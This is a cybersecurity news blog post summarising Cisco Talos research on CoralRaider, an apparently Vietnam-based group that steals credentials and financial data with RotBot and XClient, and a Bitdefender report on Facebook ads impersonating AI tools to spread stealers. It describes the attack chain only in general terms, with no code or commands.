Hackers in Vietnam Use Malware to Steal Financial Information All Over Asia including India.

Hackers in Vietnam Use Malware

Hackers in Vietnam Use Malware to Steal Financial Information All Over Asia including India.

Vietnam:  Since at least May 2023, a threat actor thought to be from Vietnam has been seen using malware to target people in several Asian and Southeast Asian countries. The malware is intended to steal valuable data.

Cisco Talos is keeping an eye on the group, which they call CoralRaider and say is driven by money. India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam are some of the countries that the program is aimed at.

Security researchers ChetanRaghuprasad and Joey Chen said, “This group’s main goal is to steal people’s login information, financial information, and social media accounts, such as business and advertising accounts.” “They employ RotBot, a customized variant of Quasar RAT, and XClient stealer as payloads.”

The group also uses common malware like AsyncRAT, NetSupport RAT, and Rhadamanthys, which is a mix of remote access trojans and information thieves.

Hackers based in Vietnam have been mainly going after business and advertising accounts. They have used stealer malware families like Ducktail, NodeStealer, and VietCredCare to take over the accounts and make more money.

The plan is to use Telegram to get the stolen data off of computers that have been hacked. This data is then sold on black markets to make money illegally.

“CoralRaider users have headquarters in Vietnam, based on the actor posts in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hard-coded in their payload binaries,” they said.

A Windows link file (LNK) is the first step in an attack chain, but it’s not clear how these files get to their targets yet.

If the LNK file is opened, an HTML application (HTA) file is downloaded and run from a download server that is controlled by the attacker. This starts a Visual Basic script that is embedded in the HTA file.

The script then decrypts and runs three other PowerShell scripts in a certain order. These scripts do anti-VM and anti-analysis checks, get around Windows User Access Control (UAC), turn off Windows and application messages, and download and run RotBot.

RotBot is set up to talk to a Telegram bot, get the XClient stealer malware, and run it in memory. This makes it easier to steal cookies, credentials, and financial data from web browsers like Brave, CốcCốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, as well as data from Discord and Telegram and screenshots.

XClient is also designed to steal information from victims’ Facebook, Instagram, TikTok, and YouTube accounts. It does this by finding out how they make payments and what rights are set for their Facebook business and ads accounts.

“RotBot is a variant of the Quasar RAT client that the threat actor customized and compiled for this campaign,” they said. “[XClient] has vast information-stealing power through its plugin module and various modules to carry out remote administrative tasks.”

Bitdefender recently shared information about a malicious advertising campaign on Facebook that is using the interest in generative AI tools to promote a number of information thieves, including Rilide, Vidar, IceRAT, and a newcomer called Nova Stealer.

The threat actor starts the attack by taking over an existing Facebook account and changing it to look like well-known AI tools from Google, OpenAI, and Midjourney. They then run paid ads on Facebook to reach more people.

One of these fake pages that looked like Midjourney had 1.2 million fans before it was taken down on March 8, 2023. The people in charge of the page were mostly from Vietnam, the US, Indonesia, the UK, Australia, and other places.

“The malvertising campaigns have tremendous reach through Meta’s sponsored ad system and have constantly been targeting European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden, and elsewhere,” the Romanian cybersecurity firm said.

About The Author:

Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space.  Besides writing for the News4Hackers blog, he’s also written for brands including CollegeDunia, Utsav Fashion, and NASSCOM.  Naager entered the field of content in an unusual way.  He began his career as an insurance sales executive, where he developed an interest in simplifying difficult concepts.  He also combines this interest with a love of narrative, which makes him a good writer in the cybersecurity field.  In the bottom line, he frequently writes for Craw Security.


Baba Vanga Predicted A Massive Surge in Cyber Attacks in 2024

Call Center Cheating American Citizens Exposed in Noida, 12 Accused Arrested

Encashing Reward Points Cost A Cyber Fraud Worth ₹1.7 Lakhs to Delhi Police Constable

About Author

Leave a Reply

Your email address will not be published. Required fields are marked *

Open chat
Can we help you?